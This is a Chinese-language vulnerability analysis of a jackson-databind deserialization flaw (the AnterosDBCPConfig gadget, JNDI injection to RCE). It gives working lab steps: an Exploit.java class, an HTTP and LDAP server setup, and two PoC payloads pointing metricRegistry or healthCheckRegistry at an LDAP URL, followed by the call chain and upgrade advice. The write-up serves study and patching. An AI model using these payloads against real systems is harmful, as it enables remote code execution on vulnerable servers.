影响范围
-
jackson-databind before 2.9.10.4
-
jackson-databind before 2.8.11.6
-
jackson-databind before 2.7.9.7
漏洞类型
JDNI注入导致RCE
利用条件
-
开启enableDefaultTyping()
-
使用了br.com.anteros.dbcp.AnterosDBCPConfig第三方依赖
漏洞概述
2020年3月,jackson-databind在github上更新了一个新的反序列化利用类br.com.anteros.dbcp.AnterosDBCPConfig,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
漏洞复现
环境搭建
pom.xml
<dependencies><dependency><groupId>com.fasterxml.jackson.core</groupId><artifactId>jackson-databind</artifactId><version>2.9.9.1</version></dependency><!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP --><dependency><groupId>br.com.anteros</groupId><artifactId>Anteros-DBCP</artifactId><version>1.0.1</version></dependency><dependency><groupId>org.slf4j</groupId><artifactId>slf4j-nop</artifactId><version>1.7.2</version></dependency><!-- https://mvnrepository.com/artifact/javax.transaction/jta --><dependency><groupId>javax.transaction</groupId><artifactId>jta</artifactId><version>1.1</version></dependency></dependencies>
漏洞利用
这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181
编译Exploit.java
Exploit.java代码如下:
import java.lang.Runtime;public class Exploit {static {try {Runtime.getRuntime().exec(\\\"calc\\\");} catch (Exception e) {e.printStackTrace();}}}
编译Exploit.java文件:
搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python -m SimpleHTTPServer 4444
搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
执行漏洞POC1
Poc.java代码如下所示:
package com.jacksonTest;import com.fasterxml.jackson.databind.ObjectMapper;import java.io.IOException;public class Poc {public static void main(String[] args) throws Exception {ObjectMapper mapper = new ObjectMapper();mapper.enableDefaultTyping();String payload = \\\"[\\\\\\\"br.com.anteros.dbcp.AnterosDBCPConfig\\\\\\\", {\\\\\\\"metricRegistry\\\\\\\":\\\\\\\"ldap://127.0.0.1:1099/Exploit\\\\\\\"}]\\\";try {mapper.readValue(payload, Object.class);} catch (IOException e) {e.printStackTrace();}}}
之后运行该程序,成功执行命令,弹出计算器:
执行漏洞POC2
package com.jacksonTest;import com.fasterxml.jackson.databind.ObjectMapper;import java.io.IOException;public class Poc {public static void main(String[] args) throws Exception {ObjectMapper mapper = new ObjectMapper();mapper.enableDefaultTyping();String payload = \\\"[\\\\\\\"br.com.anteros.dbcp.AnterosDBCPConfig\\\\\\\", {\\\\\\\"healthCheckRegistry\\\\\\\":\\\\\\\"ldap://127.0.0.1:1099/Exploit\\\\\\\"}]\\\";try {mapper.readValue(payload, Object.class);} catch (IOException e) {e.printStackTrace();}}}
运行结果如下所示:
漏洞分析
由于poc2与poc1类似,所以下面只对poc1进行简易分析:
首先定位到br.com.anteros.dbcp.AnterosDBCPConfig类,之后发现一处可疑的JNDI注入:
由于参数来自object,所以之后全局搜索调用getObjectOrPerformJndiLookup函数调用的地方发现setMetricRegistry处有一处可控的调用,此处的参数metricRegistry可有json指定,之后传入getObjectOrPerformJndiLookup,之后再次传入lookup,从而导致JNDI注入的发生,并最终导致RCE:
至于setHealthCheckRegistry也是一样的:
整个利用链如下所示:
mapper.readValue->setMetricRegistry->getObjectOrPerformJndiLookup->lookup
修复建议
-
及时将jackson-databind升级到安全版本
-
升级到较高版本的JDK。
参考链接
https://github.com/FasterXML/jackson-databind/issues/2634
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34112.html
